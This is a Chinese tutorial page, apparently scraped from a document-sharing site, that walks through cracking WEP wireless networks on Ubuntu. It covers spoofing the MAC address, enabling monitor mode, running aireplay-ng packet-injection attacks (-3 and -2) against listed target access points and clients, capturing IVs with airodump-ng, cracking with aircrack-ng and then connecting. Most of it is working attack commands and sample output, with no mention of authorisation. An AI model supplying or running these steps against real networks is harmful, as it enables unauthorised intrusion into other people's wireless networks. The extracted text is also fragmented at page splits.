《(流程管理)详解U无线破解流程》由会员分享,可在线阅读,更多相关《(流程管理)详解U无线破解流程(6页珍藏版)》请在金锄头文库上搜索。
1、详解Ubuntu无线破解流程破解安装和使用大致流程如下sudo apt-get install libnl-dev libssl-dev libertaswgethttp:/wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2009-04-16.tar.bz2#注意http:/wireless.kernel.org/download/compat-wireless-2009-04-16.tar.bz2一定要下载最新的包#我这里只是演示而已sudo cp compat-wireless-2009-04-16.tar.
2、bz2 /usr/src #把包移到/usr/srcsudo tar xf compat-wireless-2009-04-16.tar.bz2 #解压cd compat-wireless-2009-04-16.tar.bz2 #编译前记得开无线开关sudo make #编译sudo make install #编译安装sudo rmmod iwlagn iwlcore #暂时卸载驱动sudo make load #加载新的无线驱动,不行就重启一下 #如果出现下面的 Unloadingmac80211. FATAL: Module mac80211 is in use. Unloading c
3、fg80211. FATAL: Module cfg80211 is in use. make: * unload Error 1 就是没暂时卸载驱动,执行sudo rmmod iwlagn iwlcore#sudo make uninstall &sudo reboot #卸载新的无线驱动并重启使用我就以4965卡为例子#下面是改变mac地址ifconfig wlan0 downmacchanger -m 00:11:22:33:44:55 wlan0ifconfig wlan0 up#下面开始使用sudo ifconfig wlan0 up #启用wlan0接口sudo airmon-ng
4、 start wlan0 #开mon0 注入接口#出现monitor mode enabled on mon0就正常sudo aireplay-ng -9 mon0 #测试是否能注入#正常就出现Injection is working!#不然就No Answer.#可以用sudo iwconfig wlan0 channel 6 来转到第6频道,6就是频道,你可以换11或1#改变后sudo aireplay-ng -9 mon0 再次测试#开始破解,具体可以参考中卫的BT3破解无线WEP和WPA增加版教程.pdf我就用4965比较支持的aireplay-ng 参数 -0 -1 -2 -3 来说
5、明一下记得,ubuntu8.10后抓包和注入都用mon0(mon系列的接口)-3 有客户端airodump-ng -w test -ivs -c 6 mon0 #用mon0接口来抓取频道6的ivs(破解wep用的包) 名字是test#出现的一堆东西.现在就是抓包破解了,最基本的,如果你有时间,你就可以等,等它的data足够到支持破解为止#下面介绍下airodump-ng出现的数据BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES00:19:E0:94:07:30 163 0 9 0 0 6 54. WPA2 CCMP PSK h#
6、00:19:E0:94:07:30 就是AP的mac Data就是wep破解需要的包 data多到一定程度就可以用aircrack-ng破解#ENC 对应的是加密方式,好像上面那行的话就是wpa2,是不能这个抓包的方式破解的要wep才可以00:1D:0F:7C:19:5E 167 0 15 0 0 5 54. WPA2 CCMP PSK 200:21:27:81:66:E6 164 0 43 7 0 6 54. WEP WEP 100:21:27:61:38:86 166 0 9 4 1 4 54. WPA2 CCMP PSK 200:21:27:1B:B1:F8 163 0 16 3 0 6
7、 54. WPA2 CCMP PSK ?00:1D:0F:43:46:54 179 5 58 29 5 6 54. WEP WEP OPN S00:21:27:73:04:C0 163 0 4 0 0 6 54. WEP WEP 600:1D:0F:36:43:0E 165 5 47 29 1 6 54. WEP WEP 00:21:27:64:25:42 164 2 52 0 0 6 54. WPA2 CCMP PSK D BSSID STATION PWR Rate Lost Packets Probes 00:19:E0:94:07:30 00:1C:26:A3:23:B9 163 0-
8、 1 20 2 huhuusb #上面那行 00:19:E0:94:07:30 就是ap的mac 00:1C:26:A3:23:B9 就是它合法的客户端00:21:27:1B:B1:F8 00:22:5F:16:91:CB 166 0- 2 165 3 00:1D:0F:43:46:54 00:13:E8:68:A5:CD 164 0- 1 3 12 00:1D:0F:43:46:54 00:13:E8:65:68:9F 165 0- 1 20 4 Sky (not associated) 00:1D:E0:6D:CB:07 174 0- 1 0 1 (not associated) 00:1
9、3:E8:65:5A:9B 163 0- 1 0 1 #ok 下面来-3(有客户端)注入sudo aireplay-ng -3 -b 00:19:E0:94:07:30 -h 00:1C:26:A3:23:B9 mon0#成功的话 airodump-ng上的对应mac的data就会不断上升就可以用aircrack破解了#-2#sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:19:E0:94:07:30 -h 00:
10、1C:26:A3:23:B9 mon0#按y就可以了#其他的我就不演示,大家参考BT3 破解无线WEP和WPA增加版教程.pdf接入无线wep1开无线2ifconfig wlan0 up #打开接口iwlist scan #扫描无线网络sudo iwconfig #查看无线设置iwconfig wlan0 key password ap aps_mac essid nick_name#例子如下sudo iwconfig wlan0 key 1234567890 essid Sky ap 00:1D:0F:43:46:54#记得用完上面的那条命令iwconfig查看,essid, Access
11、Point Encryption key 一定要有才能接入#很多时候 出现 Access Point: Not-Associated ,你就要用sudo iwconfig wlan0 ap off/any 来尝试#再不行就用ifconfig wlan0 up 再用iwconfig 重新设置sudo dhclient wlan0 #利用dhcp 接入无线接入wpa方法按的blog复制下来,你一般不需要用到ubuntu不能用dhclinet wlan0 接入wpa加密的AP我的方法就是利用模拟FAKE注入来接入AP然后用dhclinet wlan0 来获得IPFirst of allyou mus
12、t know wpas AP password ,essid,bssid#essid is APsMACwpa_passphrase TP-LINK password acc_wpaThenvi acc_wpa#add bssid after ssid#example bssid=00:90:96:00:00:02At lastsudo wpa_supplicant -c test -Dwired -i wlan0sudo iwconfig wlan0 essid TP-LINK key 0123456789 ap 00:90:96:00:00:02iwconfig#if it return as followwlan0 IEEE 802.11abgn ESSID:TP-LINK Mode:Managed Frequency:2.412 GHz Access Point: 00:90:96:00:00:02#Then you can access wpas APdhclient wlan0
